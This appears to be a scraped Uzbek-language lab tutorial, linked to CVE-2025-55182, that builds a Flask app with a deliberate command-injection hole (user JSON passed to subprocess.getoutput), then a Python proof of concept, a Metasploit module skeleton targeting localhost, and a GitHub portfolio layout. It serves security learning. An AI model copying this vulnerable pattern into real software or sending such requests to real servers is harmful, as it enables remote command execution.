Share
## https://sploitus.com/exploit?id=740C65EE-76C3-5625-B300-21580FA9F94A
## ๐งช 1-QADAM: Demo vulnerable web-app (LAB)
Biz CVE-2025-55182 ga oโxshash mantiq (unsafe server-side execution) yaratamiz.
๐ ```vuln_app/app.py```
```bash
from flask import Flask, request
import subprocess
app = Flask(__name__)
@app.route("/render", methods=["POST"])
def render():
data = request.json.get("component")
# โ VULNERABLE: user input to command execution
result = subprocess.getoutput(data)
return result
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000)
```
Ishga tushirish:
```bash
pip install flask
python app.py
```
## ๐ Bu React2Shellโga oโxshash:
server-side input โ execution
## ๐งช 2-QADAM: Python PoC (test exploit)
Bu faqat RCE borligini isbotlash uchun.
๐ ```poc.py```
```bash
import requests
url = "http://127.0.0.1:3000/render"
payload = {
"component": "id"
}
r = requests.post(url, json=payload)
print("[+] Server response:")
print(r.text)
```
Agar chiqsa:
```bash
uid=1000(user) gid=1000(user)
```
โ
RCE CONFIRMED (LAB)
## ๐ง 3-QADAM: Metasploit exploit SKELETON
Bu โ professional framework format, lekin weaponized emas.
๐ Joylashuvi
```bash
~/.msf4/modules/exploits/linux/http/lab_react_like_rce.rb
```
๐ ```lab_react_like_rce.rb```
```bash
require 'msf/core'
class MetasploitModule 'LAB React-like Server RCE',
'Description' => %q{
Demonstration exploit for unsafe server-side execution.
Tested only in a controlled lab environment.
},
'Author' => ['Behruz'],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2025-01-01',
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Vulnerable endpoint', '/render'])
])
end
def exploit
print_status("Sending lab command execution request")
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/json',
'data' => {
'component' => 'whoami'
}.to_json
})
print_good("Request sent (LAB validation only)")
end
end
```
Ishlatish:
```bash
msfconsole
use exploit/linux/http/lab_react_like_rce
set RHOSTS 127.0.0.1
run
```
๐ Bu yerda:
โ reverse shell yoโq
โ
framework knowledge + exploit logic bor
## ๐ 4-QADAM: Portfolio struktura (MUHIM)
GitHubโda shunday koโrinsin:
```bash
lab-react-like-rce/
โโ vuln_app/
โ โโ app.py
โโ poc/
โ โโ poc.py
โโ metasploit/
โ โโ lab_react_like_rce.rb
โโ README.md
```
## ๐ 5-QADAM: READMEโda shunday yoziladi
```bash
## Description
This project demonstrates a lab-based server-side code execution
vulnerability inspired by modern RCE CVEs.
## Scope
- Tested only in a controlled lab environment
- No real-world systems were targeted
## Skills Demonstrated
- Vulnerability analysis
- Python PoC development
- Custom Metasploit module creation
```